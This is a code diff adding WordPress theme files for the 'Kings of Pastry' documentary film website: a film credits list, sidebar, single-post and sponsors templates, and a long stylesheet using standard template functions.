+	<p>Assistant Editors</p>
+	<p>Gabriella Kessler</p>
+	<p>Nick Katzenbach</p>
+	<p>Rebecca Lando</p>
+	<p>Aaron Soffin</p>
+<br />
+	<p>Translators</p>
+	<p>Gabriella Kessler</p>
+	<p>Jean-Marceau Secheret</p>
+	<p>Patricia Soussloff</p>
+	<p>Leslie Tcheyan</p>
+	<p>Julie Thiery</p>
+<br />
+	<p>Legal</p>
+	<p>Shatzkin &amp; Mayer</p>
+	<p>Karen Shatzkin</p>
+<br />
+	<p>Music Clearances</p>
+	<p>Diamond Time Ltd.</p>
+	<p>Cathy Carapella</p>
+<br />
+	<p>Audio Re-Recordist</p>
+	<p>PostWorks</p>
+	<p>Paul Furedi</p>
+<br />
+	<p>Colorist</p>
+	<p>DuArt Film & Video</p>
+	<p>Jane Tolmachyov</p>
+<br />
+	<p>Online Editor</p>
+	<p>DuArt Film & Video</p>
+	<p>David Gauff</p>
+<br />
+	<p>Sales Agent</p>
+	<p>Jane Balfour Services</p>
+<br />
+	<p>Music Consultants</p>
+	<p>David Mansfield</p>
+	<p>Kevin Bents</p>
+	<p>Matthew Munisteri</p>
+<br />
+	<p>Music Supervisor</p>
+	<p>Alex Toledano</p>
+<br />
+
+	</div>

+ 43 - 0
sidebar.php

@@ -0,0 +1,43 @@
+<?php
+/**
+ * The Sidebar containing the primary and secondary widget areas
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+		<div id="primary" class="widget-area">
+			<ul class="xoxo">
+<?php if ( ! dynamic_sidebar( 'primary-widget-area' ) ) : // begin primary widget area ?>
+			<li id="search" class="widget-container widget_search">
+				<?php get_search_form(); ?>
+			</li>
+
+			<li id="archives" class="widget-container">
+				<h3 class="widget-title"><?php _e( 'Archives', 'twentyten' ); ?></h3>
+				<ul>
+					<?php wp_get_archives( 'type=monthly' ); ?>
+				</ul>
+			</li>
+
+			<li id="meta" class="widget-container">
+				<h3 class="widget-title"><?php _e( 'Meta', 'twentyten' ); ?></h3>
+				<ul>
+					<?php wp_register(); ?>
+					<li><?php wp_loginout(); ?></li>
+					<?php wp_meta(); ?>
+				</ul>
+			</li>
+<?php endif; // end primary widget area ?>
+			</ul>
+		</div><!-- #primary .widget-area -->
+
+<?php if ( is_active_sidebar( 'secondary-widget-area' ) ) : // Nothing here by default and design ?>
+		<div id="secondary" class="widget-area">
+			<ul class="xoxo">
+				<?php dynamic_sidebar( 'secondary-widget-area' ); ?>
+			</ul>
+		</div><!-- #secondary .widget-area -->
+<?php endif; ?>

+ 48 - 0
single.php

@@ -0,0 +1,48 @@
+<?php
+/**
+ * The Template used to display all single posts
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+<?php get_header(); ?>
+
+		<div id="container" class="onecolumn">
+			<div id="content">
+
+					<?php the_post(); ?>
+				
+
+				<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+					<h1 class="entry-title"><?php the_title(); ?></h1>
+
+<div class="entry-content">
+	<?php the_content(); ?>
+</div><!-- .entry-content -->
+						<div class="hide">
+						<div id="content_video">
+						<div id='contentInner'>
+						<?php the_content(); ?>
+						</div>
+						</div>
+						</div>
+					
+
+
+				
+
+
+				</div><!-- #post-<?php the_ID(); ?> -->
+
+
+
+				<?php comments_template( '', true ); ?>
+
+			</div><!-- #content -->
+		</div><!-- #container -->
+
+<?php get_sidebar(); ?>
+<?php get_footer(); ?>

+ 29 - 0
sponsors.php

@@ -0,0 +1,29 @@
+<?php
+/**
+ * Template Name: Sponsors
+ */
+?>
+<?php get_header(); ?>
+
+		<div id="container" class="onecolumn">
+			<div id="content">
+
+<?php the_post(); ?>
+
+				<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+				
+					<div class="entry-content">
+						<div class="sponsors">
+							<h3>Sponsors</h3>
+							<img src="<?php bloginfo( 'template_url' ); ?>/images/support.jpg" width="300"/>
+						<?php the_content(); ?>
+						</div>
+					</div><!-- .entry-content -->
+				</div><!-- #post-<?php the_ID(); ?> -->
+
+				<?php comments_template( '', true ); ?>
+
+			</div><!-- #content -->
+		</div><!-- #container -->
+
+<?php get_footer(); ?>

+ 1637 - 0
style.css

@@ -0,0 +1,1637 @@
+/* @override http://silverbullet-2.local/~david/trunk/kop/wp-content/themes/pastry/style.css */
+
+
+/*
+Theme Name: Kings of Pastry
+Theme URI: http://kingsofpastry.com
+Description: based on Kirby by Ian Stewart.
+Author: windhamdavid
+Author URI: http://kingsofpastry.com
+Version: 0.1.0
+*/
+
+
+/* --------------------------------------------------------------
+
+   Reset default browser CSS.
+
+   Based on work by Eric Meyer:
+   http://meyerweb.com/eric/tools/css/reset/index.html
+
+-------------------------------------------------------------- */
+
+html, body, div, span, applet, object, iframe,
+h1, h2, h3, h4, h5, h6, p, blockquote, pre,
+a, abbr, acronym, address, big, cite, code,
+del, dfn, em, font, img, ins, kbd, q, s, samp,
+small, strike, strong, sub, sup, tt, var,
+b, u, i, center,
+dl, dt, dd, ol, ul, li,
+fieldset, form, label, legend,
+table, caption, tbody, tfoot, thead, tr, th, td {
+	margin: 0;
+	padding: 0;
+	border: 0;
+	vertical-align: baseline;
+	background: transparent;
+}
+body {
+	line-height: 1;
+}
+h1,h2,h3,h4,h5,h6 {
+	font-weight: normal;
+	clear: both;
+}
+ol, ul {
+	list-style: none;
+}
+blockquote {
+	quotes: none;
+}
+blockquote:before, blockquote:after {
+	content: '';
+	content: none;
+}
+del {
+	text-decoration: line-through;
+}
+/* tables still need 'cellspacing="0"' in the markup */
+table {
+	border-collapse: collapse;
+	border-spacing: 0;
+}
+a img { border: none; }
+
+.hide {
+	display: none;
+}
+.clear {
+	clear: both;
+}
+
+/*
+LAYOUT: Two columns
+DESCRIPTION: Two-column fixed layout with one sidebar right of content
+*/
+
+#container {
+	float: left;
+	margin: 0 -360px 0 0;
+	width: 100%;
+}
+#content {
+	margin: 0 360px 0 20px;
+}
+body.home #content  {
+	margin: 0 360px 0 0;
+}
+#primary,
+#secondary {
+	float: right;
+	overflow: hidden;
+	width: 220px;
+}
+#secondary {
+	clear: right;
+}
+#footer {
+	clear: both;
+	width: 100%;
+}
+
+/*
+LAYOUT: One column, no sidebar
+DESCRIPTION: One centered column with no sidebar
+*/
+
+.onecolumn #content {
+	margin: 0 auto;
+	width: 640px;
+}
+
+
+
+/* =Fonts
+-------------------------------------------------------------- */
+body,
+input,
+textarea,
+.page-title span,
+.pingback a.url {
+	font-family: Georgia, "Bitstream Charter", serif;
+}
+
+h3#comments-title,
+h3#reply-title,
+#access .menu,
+#cancel-comment-reply-link,
+.form-allowed-tags,
+#site-info,
+#site-title,
+#wp-calendar,
+.comment-meta,
+.comment-body tr th,
+.comment-body thead th,
+.entry-content label,
+.entry-content tr th,
+.entry-content thead th,
+.entry-meta,
+.entry-title,
+.entry-utility,
+#respond label,
+.navigation,
+.page-title,
+.pingback p,
+.reply,
+.widget_search label,
+.widget-title
+{
+	font-family: "Helvetica Neue", Arial, Helvetica, "Nimbus Sans L", sans-serif;
+}
+
+pre {
+	font-family: "Courier 10 Pitch", Courier, monospace;
+}
+
+code {
+	font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace;
+}
+
+
+
+/* =Structure
+-------------------------------------------------------------- */
+
+/* The main theme structure */
+#access .menu-header,
+#colophon,
+#branding,
+#main,
+#wrapper {
+	margin: 0 auto;
+	width: 850px;
+}
+#wrapper {
+	background: url(images/1.png);
+	padding: 0 20px;
+	color: #d7e3f7;
+	margin-bottom: 20px;
+}
+
+/* Structure the footer area */
+#footer-widget-area {
+	overflow: hidden;
+}
+#footer-widget-area .widget-area {
+	float: left;
+	margin-right: 20px;
+	width: 220px;
+}
+#footer-widget-area #fourth {
+	margin-right: 0;
+}
+#site-info {
+	float: left;
+	width: 700px;
+	font-weight: bold;
+	font-size: 14px;
+}
+#site-generator {
+	float: right;
+	width: 120px;
+}
+
+
+
+/* =Global Elements
+-------------------------------------------------------------- */
+
+/* Main global 'theme' and typographic styles  */
+body {
+	background: #f1f1f1;
+}
+body, input, textarea {
+	color: #666;
+	font-size: 12px;
+	line-height: 18px;
+}
+hr {
+	background-color: #E7E7E7;
+	border:0;
+	height: 1px;
+	margin-bottom: 18px;
+	clear:both;
+}
+
+/* Text elements */
+p {
+	margin-bottom: 18px;
+	color: #252525;
+}
+ul {
+	list-style: square;
+	margin: 0 0 18px 1.5em;
+	line-height: 12px;
+}
+ol {
+	list-style: decimal;
+	margin: 0 0 18px 1.5em;
+}
+ol ol {
+	list-style:upper-alpha;
+}
+ol ol ol {
+	list-style:lower-roman;
+}
+ol ol ol ol {
+	list-style:lower-alpha;
+}
+ul ul, ol ol, ul ol, ol ul {
+	margin-bottom:0;
+}
+dl {
+	margin:0 0 24px 0;
+}
+dt {
+	font-weight: bold;
+}
+dd {
+	margin-bottom: 18px;
+}
+strong {
+	font-weight: bold;
+}
+cite, em, i {
+	font-style: italic;
+}
+big {
+	font-size: 131.25%;
+}
+ins {
+	background: #FFFFCC;
+}
+blockquote {
+	font-style: italic;
+	padding: 0 3em;
+}
+blockquote cite,
+blockquote em,
+blockquote i {
+	font-style: normal;
+}
+pre {
+	background: #f7f7f7;
+	color: #222;
+	line-height: 18px;
+	margin-bottom: 18px;
+	padding: 1.5em;
+}
+abbr,
+acronym {
+	border-bottom: 1px dotted #666;
+	cursor: help;
+}
+ins {
+	text-decoration: none;
+}
+sup,
+sub {
+	height: 0;
+	line-height: 1;
+	vertical-align: baseline;
+	position: relative;
+}
+sup {
+	bottom: 1ex;
+}
+sub {
+	top: .5ex;
+}
+input[type="text"], textarea {
+	padding: 0 0 0 3px;
+}
+a {
+	text-decoration: none;
+}
+a:link {
+	color: #7a95ab;
+	text-decoration: none;
+}
+a:visited {
+	color: #7a95ab;
+	text-decoration: none;
+}
+a:active {
+	color: #000;
+	outline:none;
+	-moz-outline-style: none;
+}
+a:hover {
+	color: #FFABE3;
+	text-decoration: none;
+}
+
+/* Text meant only for screen readers */
+.screen-reader-text {
+	position: absolute;
+	left: -9000px;
+}
+
+
+
+/* =Header
+-------------------------------------------------------------- */
+
+#header {
+	margin-top: 60px;
+	padding: 30px 0 0 0;
+}
+#site-title {
+	float: left;
+	margin: 0 0 18px 0;
+	width: 700px;
+	font-size: 30px;
+	line-height: 36px;
+	display: none;
+}
+#site-title a {
+	color: #000;
+	font-weight: bold;
+	text-decoration: none;
+}
+#site-description {
+	clear: right;
+	float: right;
+	font-style: italic;
+	margin: 14px 0 18px 0;
+	width: 220px;
+	display: none;
+}
+
+/* This is the custom header image */
+#branding img {
+	clear: both;
+	
+	display: block;
+}
+
+/* PASTRY =Menu
+-------------------------------------------------------------- 
+*/
+
+.page-item-58 {
+	padding-left: 80px;
+}
+.page-item-11 {
+	padding-left: 80px;
+}
+.page-item-15 {
+	padding-left: 45px;
+}
+.page-item-21 {
+	padding-left: 40px;
+}
+.page-item-2 {
+	padding-left: 30px;
+}
+
+
+
+li#menu-item-120 {
+	padding-left: 30px;
+}
+li#menu-item-122 {
+	padding-left: 40px;
+}
+li#menu-item-125 {
+	padding-left: 45px;
+}
+
+li#menu-item-181 {
+	padding-left: 30px;
+}
+li#menu-item-183 {
+	padding-left: 40px;
+}
+li#menu-item-186 {
+	padding-left: 55px;
+}
+li#menu-item-390 {
+	padding-left: 65px;
+}
+/* =Menu
+-------------------------------------------------------------- */
+
+#access {
+	margin: -70px auto 0;
+	width: 840px;
+	display:block;
+	float:left;
+}
+#access .menu-header {
+	font-size: 21px;
+	margin-left: 12px;
+}
+#access .menu-header ul {
+	list-style: none;
+	margin: 0;
+	-moz-outline-style: none;
+	outline: none;
+}
+#access .menu-header li {
+	float:left;
+	position: relative;
+}
+#access a {
+	display:block;
+	text-decoration:none;
+	color: #7a95ab;
+	padding:0 10px;
+	line-height:38px;
+}
+
+#access ul ul {
+	display:none;
+	position:absolute;
+	top:38px;
+	left:0;
+	float:left;
+	-webkit-box-shadow: 0px 3px 3px rgba(0,0,0,0.2);
+	-moz-box-shadow: 0px 3px 3px rgba(0,0,0,0.2);
+	box-shadow: 0px 3px 3px rgba(0,0,0,0.2);
+	z-index: 99999;
+}
+#access ul ul ul {
+	left:100%;
+	top:0;
+}
+#access ul ul a {
+	background:#333;
+	height:auto;
+	line-height:1em;
+	padding:10px;
+	width: 130px;
+}
+#access li:hover > a,
+#access ul ul :hover > a {
+	color: #000;
+}
+#access ul li:hover > ul {
+	display:block;
+}
+/* PASTRY=Content
+-------------------------------------------------------------- */
+.synop_thumb {
+	float: left;
+	padding: 5px 10px 0 0;
+}
+.current_page_item a {
+	text-decoration:none;
+	color:#000;
+}
+#access a:active {
+	text-decoration:none;
+	color: #000;
+}
+
+li:active
+{
+outline: none;
+-moz-outline-style: none;
+}
+
+li:focus
+{
+-moz-outline-style: none;
+-moz-outline-style: none;
+}
+.loading {
+	background: url(images/loading_sun.gif) no-repeat center;
+	width: 480px;
+	height: 360px;
+}
+
+#content .left_col_home {
+	float: left;
+	width: 200px;
+	font-size: 12px;
+	line-height: 10px;
+}
+#content .left_col_home h2 {
+	margin: 0px 0px 0px;
+	font-size: 13px;
+	}
+#content .left_col_home h3 {
+	margin: 0px 0px 0px;
+	}
+#content .left_col_home p {
+	margin-bottom: 0px;
+	padding: 0px;
+	line-height: 14px;
+}
+#content .right_col_home {
+	padding: 0px 0px 68px 0px;
+	font-size: 12px;
+	line-height: 15px;
+}
+#content .right_col_home h2{
+	margin: 0px 0px 0px;
+	font-size: 13px;
+	}
+#content .right_col_home p {
+	font-size: 12px;
+	line-height: 10px;
+	margin: 6px;
+}
+#content_video {
+	height: 360px;
+	width: 480px;
+	margin: 0px 0px 25px -10px;
+	float: left;
+}
+#clips {
+	line-height: 1.2em;
+	font-size: 14px;
+}
+#sidebar_home {
+	float: right;
+	width: 325px;
+	font-size: 13px;
+	margin: 0 0 20px;
+}
+#sidebar_home p {
+	margin-top: 0px;
+}
+#sidebar_home h2 {
+	margin-left: 115px;
+	margin-top: 3px;
+	color: #252525;
+}
+#sidebar_home .sponsors h2 {
+	color: #252525;
+	margin: 0px 0px 10px;
+}
+#sidebar_home .sponsors p + p {
+	text-indent: 0em;
+}
+.sidebar_loading {
+	width: 280px;
+	height: 360;
+}
+#sidebar_home p + p {
+text-indent: 2em;
+}
+		
+#sidebar_home p:first-line {
+
+}
+.entry-content h3 {
+	color: #000;
+	text-transform: capitalize;
+	font-weight: bold;
+	font-variant: small-caps;
+}
+.entry-content h2 {
+	color: #000;
+	text-transform: capitalize;
+	margin: 0 0 10px;
+
+}
+p.no {
+	display: none;
+}
+.facebook {
+	float: left
+}
+.twitter {
+	float: right;
+}
+.flickr {
+	float: left;
+}
+.phfilms_logo {
+	margin: 10px 0;
+}
+.phfilms_logo a {
+	background: url(images/phfilmslogo.png) no-repeat 0 0;
+	width: 480px;
+	height: 67px;
+	float: left;
+	overflow: hidden;
+	margin: 0 0 10px;
+}
+.phfilms_logo a:hover {
+	background: url(images/phfilmslogo.png) no-repeat 0 -67px;
+	width: 480px;
+	height: 67px;
+	float: left;
+	overflow: hidden;
+}
+.facebook a {
+	margin: 0px 4px;
+	width: 20px;
+	height: 20px;
+	float: left;
+	overflow: hidden;
+	background: #fff url(images/facebook.jpg) no-repeat 0 0;
+}
+.facebook a:hover {
+	width: 20px;
+	height: 20px;
+	float: left;
+	overflow: hidden;
+	background: #fff url(images/facebook.jpg) no-repeat 0 -20px;
+}
+.twitter a {
+	margin: 0px 4px;
+	width: 20px;
+	height: 20px;
+	float: left;
+	overflow: hidden;
+	background: #fff url(images/twitter.jpg) no-repeat 0 0;
+}
+.twitter a:hover {
+	width: 20px;
+	height: 20px;
+	float: left;
+	overflow: hidden;
+	background: #fff url(images/twitter.jpg) no-repeat 0 -20px;
+}
+.flickr a {
+	margin: 0px 4px;
+	width: 20px;
+	height: 20px;
+	float: left;
+	overflow: hidden;
+	background: #fff url(images/flickr.jpg) no-repeat 0 0;
+}
+.flickr a:hover {
+	width: 20px;
+	height: 20px;
+	float: left;
+	overflow: hidden;
+	background: #fff url(images/flickr.jpg) no-repeat 0 -20px;
+}
+.roster {
+	padding: 0 0 0 30px;
+	font-size: 12px;
+	line-height: 12px;
+}
+.roster p {
+	line-height: 12px;
+	margin: 0px;
+	color: #333;
+}
+.roster p + p, .roster p:first-line {
+	line-height: 12px;
+	margin: 0px;
+	font-weight: normal;
+}
+.roster2 {
+	width: 250px;
+	float: right;
+	padding: 0 0 0 30px;
+	margin: 0 0 0 30px;
+	font-size: 12px;
+	line-height: 12px;
+}
+.roster2 p {
+	line-height: 12px;
+	margin: 0px;
+	color: #333;
+}
+.roster2 p + p, .roster p:first-line {
+	line-height: 12px;
+	margin: 0px;
+	font-weight: normal;
+}
+
+.blog_separator {
+	margin: 0 0 20px 180px;
+}
+.content_video {
+	background: #fff;
+	width: 480px;
+}
+.poster{
+	background: #fff;
+	width: 480px;
+	margin: 0 0 10px;
+}
+.links {
+	float: left;
+	font-size: 13px;
+	margin: 0 10px;
+	color: #7a95ab;
+}
+.alink {
+	float: left;
+	font-size: 13px;
+	margin: 0 10px;
+	color: #7a95ab;
+}
+#content .contact_block p {
+	line-height: 14px;
+	margin: 0 0 10px;
+	padding: 0px;
+	}
+.contact_block {
+	width: 300px;
+	float: left;
+}
+/* =Content
+-------------------------------------------------------------- */
+
+#main {
+	overflow: hidden;
+	padding: 20px 0 0 0;
+	border-top: solid 2px #7a95ab;
+}
+#content {
+	margin-bottom: 36px;
+}
+#content,
+#content input,
+#content textarea {
+	color: #444;
+	font-size: 16px;
+	line-height: 24px;
+}
+#content p,
+#content ul,
+#content ol,
+#content dd,
+#content pre,
+#content hr {
+	margin-bottom:24px;
+}
+#content ul ul,
+#content ol ol,
+#content ul ol,
+#content ol ul {
+	margin-bottom:0;
+}
+#content pre,
+#content kbd,
+#content tt,
+#content var {
+	font-size: 15px;
+	line-height: 21px;
+}
+#content code {
+	font-size: 13px;
+}
+#content strong,
+#content b,
+#content dt,
+#content th {
+	color: #000;
+}
+#content h1,
+#content h2,
+#content h3,
+#content h4,
+#content h5,
+#content h6 {
+	color: #000;
+	margin: 0 0 20px 0;
+	line-height: 1.5em;
+}
+#content h3.light {
+	color: #7a95ab;
+}
+#content .category-screenings p {
+	margin: 0;
+}
+#content .category-screenings .excerpt p {
+	margin: 0px;
+	font-size: 13px;
+}
+#content .category-screenings h3 {
+	margin: 25px 0 0;
+}
+
+#content table {
+	border: 1px solid #e7e7e7;
+	text-align: left;
+	margin: 0 -1px 24px 0;
+	width: 100%;
+}
+#content tr th,
+#content thead th {
+	color: #888;
+	font-size: 12px;
+	font-weight: bold;
+	line-height: 18px;
+	padding: 9px 24px;
+}
+#content tr td {
+	border-top: 1px solid #e7e7e7;
+	padding: 6px 24px;
+}
+#content tr.odd td {
+	background: #F2F7FC;
+}
+.hentry {
+	margin: 0 0 14px 0;
+}
+.home .sticky {
+	background: #F2F7FC;
+	border-top: 4px solid #000;
+	padding: 18px 20px;
+	margin-left: -20px;
+	margin-right: -20px;
+}
+.single .hentry {
+	margin: 0 0 36px 0;
+}
+.page-title {
+	color: #000;
+	font-size: 14px;
+	font-weight: bold;
+	margin: 0 0 36px 0;
+}
+.page-title span {
+	color: #444;
+	font-size: 16px;
+	font-style: italic;
+	font-weight: normal;
+}
+.page-title a:link, .page-title a:visited {
+	color:#888;
+	text-decoration: none;
+}
+.page-title a:active, .page-title a:hover {
+	color: #FF4B33;
+}
+.entry-title,
+.entry-meta {
+	clear: left;
+	float: left;
+	margin-right: 68px;
+}
+#content .entry-title {
+	color: #000;
+	font-size: 21px;
+	font-weight: bold;
+	margin-bottom: 0;
+}
+.entry-title a:link, .entry-title a:visited {
+	color:#000;
+	text-decoration: none;
+}
+.entry-title a:active, .entry-title a:hover {
+	color: #FF4B33;
+}
+.entry-meta {
+	color: #888;
+	font-size: 12px;
+}
+.entry-meta abbr, .entry-utility abbr {
+	border: none;
+}
+.entry-meta abbr:hover, .entry-utility abbr:hover {
+	border-bottom: 1px dotted #666;
+}
+.entry-content,
+.entry-summary {
+	clear: both;
+	padding: 12px 0 25px 0;
+}
+#content .entry-summary p:last-child {
+	margin-bottom: 12px;
+}
+.entry-content fieldset {
+	border: 1px solid #E7E7E7;
+	margin: 0 0 24px 0;
+	padding: 24px;
+}
+.entry-content fieldset legend {
+	background: #fff;
+	color: #000;
+	font-weight: bold;
+	padding: 0 24px;
+}
+.entry-content input {
+	margin: 0 0 24px 0;
+}
+.entry-content input.file,
+.entry-content input.button {
+	margin-right: 24px;
+}
+.entry-content label {
+	color: #888;
+	font-size: 12px;
+}
+.entry-content select {
+	margin: 0 0 24px 0;
+}
+.entry-content sup,
+.entry-content sub {
+	font-size: 10px;
+}
+.entry-content blockquote.left {
+	float: left;
+	margin-left: 0;
+	margin-right: 24px;
+	text-align: right;
+	width: 33%;
+}
+.entry-content blockquote.right {
+	float: right;
+	margin-left: 24px;
+	margin-right: 0;
+	text-align: left;
+	width: 33%;
+}
+.page-link {
+	color: #000;
+	font-weight:bold;
+	margin:0 0 22px 0;
+	word-spacing:0.5em;
+}
+.page-link a:link,
+.page-link a:visited {
+	background: #f1f1f1;
+	color:#444;
+	font-weight:normal;
+	padding:0.5em 0.75em;
+	text-decoration:none;
+}
+.home .sticky .page-link a {
+	background: #D9E8F7;
+}
+.page-link a:active,
+.page-link a:hover {
+	color: #FF4B33;
+}
+#entry-author-info {
+	background: #F2F7FC;
+	border-top: 4px solid #000;
+	padding: 18px 20px;
+	margin: 24px 0;
+	overflow: hidden;
+	clear: both;
+	font-size: 14px;
+	line-height: 20px;
+}
+#entry-author-info #author-avatar {
+	background: #fff;
+	border: 1px solid #e7e7e7;
+	float: left;
+	margin: 0 -104px 0 0;
+	padding: 11px;
+	height: 60px;
+}
+#entry-author-info #author-description {
+	float: left;
+	margin: 0 0 0 104px;
+}
+#entry-author-info h2 {
+	color: #000;
+	font-weight: bold;
+	font-size: 100%;
+	margin-bottom: 0;
+}
+.entry-utility {
+	color: #888;
+	font-size: 12px;
+	line-height: 18px;
+	clear: both;
+}
+.entry-meta a, .entry-utility a {
+	color: #888;
+}
+.entry-meta a:hover, .entry-utility a:hover {
+	color: #FF4B33;
+}
+#content .video-player {
+	padding: 0;
+}
+
+
+
+/* Asides
+-------------------------------------------------------------- */
+
+.home #content .category-asides p {
+	font-size: 14px;
+	line-height: 20px;
+	margin-bottom: 10px;
+	margin-top:0;
+}
+.home .hentry.category-asides {
+	padding: 0;
+}
+.home #content .category-asides .entry-content {
+	padding-top: 0;
+}
+
+
+
+
+/* Gallery listing
+-------------------------------------------------------------- */
+
+.category-gallery {
+	margin-bottom: 48px;
+}
+.category-gallery h2 {
+	margin-top: 10px;
+}
+.category-gallery .entry-meta {
+}
+.category-gallery .size-thumbnail img {
+	border: 10px solid #f1f1f1;
+	margin-bottom: 0;
+}
+.category-gallery .gallery-thumb {
+	float: left;
+	margin-right:20px;
+	margin-top: -4px;
+}
+.home #content .category-gallery .entry-content p {
+	display: inline;
+}
+.home #content .category-gallery .entry-utility {
+	padding-top:4px;
+}
+
+
+/* Attachment pages
+-------------------------------------------------------------- */
+
+.entry-content .attachment img {
+	margin-bottom: 0;
+}
+.attachment .entry-content .entry-caption {
+	font-size: 140%;
+	margin-top: 24px;
+}
+.attachment .entry-content .nav-previous a:before {
+	content: '\2190\00a0';
+}
+.attachment .entry-content .nav-next a:after {
+	content: '\00a0\2192';
+}
+
+
+
+/* Images
+-------------------------------------------------------------- */
+
+.entry-content img {
+	margin: 0 0 14px 0;
+	max-width: 640px;
+}
+.alignleft,
+img.alignleft {
+	display: inline;
+	float: left;
+	margin-right: 14px;
+	margin-top: 4px;
+}
+.alignright,
+img.alignright {
+	display: inline;
+	float: right;
+	margin-left: 24px;
+	margin-top: 4px;
+}
+.aligncenter,
+img.aligncenter {
+	clear: both;
+	display: block;
+	margin-left: auto;
+	margin-right: auto;
+}
+img.alignleft, img.alignright, img.aligncenter {
+	margin-bottom: 12px;
+}
+#content .wp-caption {
+	background: #f1f1f1;
+	color: #888;
+	font-size: 12px;
+	line-height: 18px;
+	text-align: center;
+	margin-bottom: 20px;
+	padding: 4px;
+}
+#content .wp-caption img {
+	margin: 5px;
+}
+#content .wp-caption p.wp-caption-text {
+	margin: 0 0 4px;
+}
+#content .wp-smiley {
+	margin:0;
+}
+#content .gallery {
+	margin: auto;
+}
+#content .gallery .gallery-item {
+	float: left;
+	margin-top: 10px;
+	text-align: center;
+	width: 33%;
+}
+#content .gallery img {
+	border: 2px solid #cfcfcf;
+}
+#content .gallery .gallery-caption {
+	margin-left: 0;
+}
+#content .gallery dl {
+	margin: 0;
+}
+#content .gallery img {
+	border: 10px solid #f1f1f1;
+}
+#content .gallery-caption {
+	color: #888;
+	font-size: 12px;
+	margin:-24px 0 24px 0;
+}
+#content .gallery br+br {
+	display: none;
+}
+
+
+
+/* =Navigation
+-------------------------------------------------------------- */
+
+.navigation {
+	font-size:  12px;
+	line-height: 18px;
+	overflow: hidden;
+	color: #888;
+}
+.navigation a:link, .navigation a:visited {
+	color: #888;
+	text-decoration: none;
+}
+.navigation a:active,
+.navigation a:hover {
+	color: #FF4B33;
+}
+.nav-previous {
+	float: left;
+	width: 50%;
+}
+.nav-next {
+	float: right;
+	width: 50%;
+	text-align:right;
+}
+#nav-above {
+	margin: 0 0 18px 0;
+}
+#nav-above {
+	display: none;
+}
+.paged #nav-above,
+.single #nav-above {
+	display: block;
+}
+#nav-below {
+	margin: -18px 0 0 0;
+}
+
+
+
+/* =Comments
+-------------------------------------------------------------- */
+
+#comments .navigation {
+	padding: 0 0 18px 0;
+}
+h3#comments-title, h3#reply-title {
+	color: #000;
+	font-weight: bold;
+	font-size: 20px;
+	margin-bottom: 0;
+}
+h3#comments-title {
+	padding: 24px 0;
+}
+.commentlist {
+	list-style: none;
+	margin: 0;
+}
+.commentlist li.comment {
+	border-bottom: 1px solid #e7e7e7;
+	line-height: 24px;
+	margin: 0 0 24px 0;
+	padding: 0 0 0 56px;
+	position: relative;
+}
+#comments .comment-body ul,
+#comments .comment-body ol {
+	margin-bottom: 18px;
+}
+#comments .comment-body p:last-child {
+	margin-bottom: 6px;
+}
+#comments .comment-body blockquote p:last-child {
+	margin-bottom: 24px;
+}
+.commentlist ol {
+	list-style: decimal;
+}
+.commentlist .avatar {
+	position: absolute;
+	top: 4px;
+	left: 0;
+}
+.comment-author {
+}
+.comment-author cite {
+	color: #000;
+	font-style: normal;
+	font-weight: bold;
+}
+.comment-author .says {
+	font-style: italic;
+}
+.comment-meta {
+	font-size: 12px;
+	margin: 0 0 18px 0;
+}
+.comment-meta a:link, .comment-meta a:visited {
+	color: #888;
+	text-decoration: none;
+}
+.comment-meta a:active,
+.comment-meta a:hover {
+	color: #FF4B33;
+}
+.commentlist .even {
+}
+.commentlist .bypostauthor {
+}
+.reply {
+	font-size: 12px;
+	padding: 0 0 24px 0;
+}
+.reply a, a.comment-edit-link {
+	color: #888;
+}
+.reply a:hover, a.comment-edit-link:hover {
+	color: #FF4B33;
+}
+.commentlist .children {
+	list-style: none;
+	margin: 0;
+}
+.commentlist .children li {
+	border: none;
+	margin: 0;
+}
+.nocomments {
+	display: none;
+}
+#comments .pingback {
+	margin-bottom: 18px;
+	padding-bottom: 18px;
+	border-bottom: 1px solid #e7e7e7;
+}
+.commentlist li.comment+li.pingback {
+	margin-top: -6px;
+}
+#comments .pingback p {
+	color: #888;
+	font-size: 12px;
+	line-height: 18px;
+	display:block;
+	margin: 0;
+}
+#comments .pingback .url {
+	font-style: italic;
+	font-size: 13px;
+}
+
+
+
+/* Comments form */
+#respond {
+	overflow: hidden;
+	position: relative;
+}
+#respond p {
+	margin: 0;
+}
+#respond .comment-notes {
+	margin-bottom: 1em;
+}
+.children #respond {
+	margin: 0 48px 0 0;
+}
+h3#reply-title {
+	margin: 18px 0;
+}
+#comments-list #respond {
+	margin: 0 0 18px 0;
+}
+#comments-list ul #respond {
+	margin: 0;
+}
+#cancel-comment-reply-link {
+	font-size: 12px;
+	line-height: 18px;
+	font-weight: normal;
+}
+#respond .required {
+	color:#FF4B33;
+	font-weight:bold;
+}
+#respond label {
+	color: #888;
+	font-size: 12px;
+}
+#respond input {
+	margin:0 0 9px 0;
+	width:98%;
+}
+#respond textarea {
+	width:99%;
+}
+#respond dt,
+#respond dd {
+	color: #888;
+	font-size: 12px;
+	line-height: 18px;
+}
+#respond dd code {
+	font-size: 11px;
+}
+#respond .form-submit {
+	margin: 0 0 24px;
+}
+#respond .form-submit input {
+	width: auto;
+}
+#respond dl {
+	margin: 0 0 10px;
+}
+#respond dt {
+	 display: inline;
+	font-weight: normal;
+}
+#respond dd {
+	display: inline;
+}
+
+
+/* =Widget Areas
+-------------------------------------------------------------- */
+
+.widget-area ul {
+	list-style: none;
+	margin-left: 0;
+}
+.widget-area ul ul {
+	list-style: square;
+	margin-left: 1.3em;
+}
+.widget_search #s { /* This keeps the search inputs in line */
+	width: 60%;
+}
+.widget_search label {
+	font-size: 14px;
+	font-weight: bold;
+	color: #222;
+	display: block;
+}
+.widget-container {
+	margin: 0 0 18px 0;
+}
+.widget-title {
+	color: #222;
+	font-weight: bold;
+}
+.widget-area a:link, .widget-area a:visited {
+	text-decoration: none;
+}
+.widget-area a:active, .widget-area a:hover {
+	text-decoration: underline;
+}
+#wp_tag_cloud div {
+	line-height: 1.6em;
+}
+#wp-calendar {
+	width:100%;
+}
+#wp-calendar caption {
+	font-weight: bold;
+	color: #222;
+	text-align: left;
+	font-size:14px;
+	padding-bottom: 4px;
+}
+#wp-calendar thead {
+	font-size:11px;
+}
